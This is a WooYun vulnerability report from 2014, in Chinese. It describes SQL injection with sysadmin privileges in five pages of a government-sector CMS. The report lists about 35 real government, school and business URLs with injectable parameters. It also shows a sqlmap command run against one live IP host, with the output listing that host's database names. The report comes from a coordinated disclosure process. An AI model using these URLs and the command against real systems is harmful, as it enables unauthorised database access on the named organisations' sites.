当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074413

漏洞标题:某政务类CMS存在5处SA权限SQL注射影响某市大量政务企业学校网站

相关厂商:cnvd

漏洞作者: X防部

提交时间:2014-09-01 16:22

修复时间:2014-11-30 16:24

公开时间:2014-11-30 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-01: 细节已通知厂商并且等待厂商处理中
2014-09-06: 厂商已经确认,细节仅向厂商公开
2014-09-09: 细节向第三方安全合作伙伴开放
2014-10-31: 细节向核心白帽子及相关领域专家公开
2014-11-10: 细节向普通白帽子公开
2014-11-20: 细节向实习白帽子公开
2014-11-30: 细节向公众公开

简要描述:

某政务类CMS存在5处SA权限SQL注射影响某市大量政务企业学校网站

详细说明:

注射文件分别存在于
/newsView.aspx
/aboutUs.aspx
/news.aspx
/gbook.aspx
/newsPic.aspx
以某一个政务网站为例:
射点:
1.http://www.zyxlkz.gov.cn/newsView.aspx?oid=8&tid=0&id=436
2.http://www.zyxlkz.gov.cn/aboutUs.aspx?oid=1
3.http://www.zyxlkz.gov.cn/news.aspx?oid=1&tid=2
4.http://www.zyxlkz.gov.cn/newsPic.aspx?oid=2&tid=6
5.http://www.zyxlkz.gov.cn/gbook.aspx?oid=9&tid=23
其他部分注射案例:
http://zunyirc.cn/newsView.aspx?oid=12&tid=0&id=592
http://www.gzqyf.com/newsView.aspx?oid=13&tid=10&id=152
http://www.gzztgs.com/newsView.aspx?oid=6&tid=0&id=5
http://www.gzsjjy.net/newsView.aspx?oid=10&tid=0&id=354
http://www.zyblxx.com/newsView.aspx?oid=2&tid=5&id=357
http://www.rhsmtgz.com/newsView.aspx?oid=2&tid=34&id=488
http://www.syxzyy.com/newsView.aspx?oid=4&tid=9&id=60
http://www.lzchaye.com/newsView.aspx?oid=3&tid=0&id=174
http://114.135.10.227:85/newsView.aspx?oid=7&tid=31&id=463
http://www.gzyhg.com/newsView.aspx?oid=2&tid=1&id=1318
http://www.zaxls.com/newsView.aspx?oid=13&tid=39&id=584
http://www.zyrbc.com/newsView.aspx?oid=4&tid=8&id=473
http://www.mtrdb.gov.cn/newsView.aspx?oid=15&tid=29&id=567
http://www.bjzj.gov.cn/newsView.aspx?oid=1&tid=3&id=912
http://www.csscg.com.cn/newsView.aspx?oid=3&tid=6&id=437
http://www.bjszxxz.cn/newsView.aspx?oid=2&tid=26&id=403
http://www.zyxhyj.com/newsView.aspx?oid=6&tid=26&id=451
http://www.gzgsyjc.com/newsView.aspx?oid=6&tid=0&id=319
http://www.gzflof.com/newsView.aspx?oid=3&tid=10&id=201
http://www.zyxdqzx.com/newsView.aspx?oid=4&tid=6&id=113
http://zylxxsp.com/newsView.aspx?oid=1&tid=10&id=177
http://www.csbz.org/newsView.aspx?oid=8&tid=0&id=180
http://gzysljj.com/newsView.aspx?oid=5&tid=26&id=192
http://www.zgldmz.cn/newsView.aspx?oid=1&tid=9&id=121
http://www.yqxaxzx.com/newsView.aspx?oid=2&tid=2&id=731
http://bjszxxz.cn/newsView.aspx?oid=2&tid=6&id=465
http://www.mtxqxj.com/newsView.aspx?oid=2&tid=1&id=565
http://www.zywzjt.cn/newsView.aspx?oid=2&tid=15&id=160
http://jatoo.com.cn/newsView.aspx?oid=3&tid=13&id=38
http://jiazheng.zy96169.com/newsView.aspx?oid=2&tid=16&id=113
http://qz77.cn/newsView.aspx?oid=2&tid=12&id=109
http://www.hhgrd.gov.cn/newsView.aspx?oid=5&tid=23&id=339
http://csscg.com.cn/newsView.aspx?oid=4&tid=8&id=426
http://zyrbc.com/newsView.aspx?oid=4&tid=8&id=472
漏洞利用:
sqlmap.py -u "http://114.135.10.227:85/newsView.aspx?oid=7&ti
d=31&id=463" --bds
available databases [9]:
[*] grasp_crm
[*] Hhgfayuam
[*] Hhgfayuan_Pwk
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
案例过多不一一演示

漏洞证明:

修复方案:

版权声明:转载请注明来源 X防部@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-09-06 09:45

厂商回复:

最新状态:

暂无